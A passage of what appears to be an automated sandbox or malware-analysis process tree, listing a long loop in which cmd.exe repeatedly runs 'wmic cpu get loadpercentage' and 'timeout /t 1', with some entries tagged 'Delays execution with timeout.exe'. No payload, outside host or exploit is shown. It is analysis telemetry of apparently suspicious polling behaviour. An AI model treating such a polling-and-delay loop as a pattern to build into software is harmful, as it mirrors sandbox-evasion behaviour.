    wmic cpu get loadpercentage
    3⤵
    PID:4956
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1068
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2736
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:396
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1056
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1228
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1460
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:132
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4440
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1124
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2960
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3620
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2420
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2588
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2948
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2044
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3784
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4640
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:836
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3624
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4728
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4468
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4972
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3360
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:760
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3556
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4400
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4456
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4268
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3588
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3520
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1780
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4532
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2064
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4364
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4460
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4808
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1316
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3728
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2140
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2236
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3292
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4520
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4784
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3776
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2572
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3212
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1828
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3188
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1088
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:616
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1028
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4564
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5088
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2940
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4156
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2312
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2384
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4980
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2008
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3080
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2400
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2932
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1228
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4440
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2740
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2960
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4720
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3620
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:244
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1376
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3048
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3116
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3912
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2644
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1224
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2220
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4128
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3408
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3960
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4632
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3764
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2208
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1876
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:236
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1584
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2600
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1012
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1924
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3928
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2128
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3384
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1968
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3244
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4896
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1772
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1680
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2132
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4652
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2424
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4788
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3768
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1428
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2748
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4076
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1840
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1724
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4132
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3580
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:736
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4428
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3748
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3296
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5024
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1068
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1380
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:564
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3052
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1464
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:468
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2708
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1448
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1716
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4704
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:788
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1324
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5076
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2432
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2044
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1644
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2768
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3904
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4716
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:972
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4196
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3604
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2808
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5112
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3836
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1136
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:804
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2772
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3820
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1936
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3220
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3508
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1556
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5104
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:440
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5108
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2868
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4664
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3400
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1680
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3988
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3664
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5000
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4788
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4512
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1428
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3212
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1508
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2912
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1724
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3872
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2576
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4220
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3468
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2940
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1080
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1172
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4628
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1056
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3108
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3080
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1808
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2740
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3760
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3224
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2792
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2148
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3620
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1544
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4588
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4116
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1564
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2032
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2796
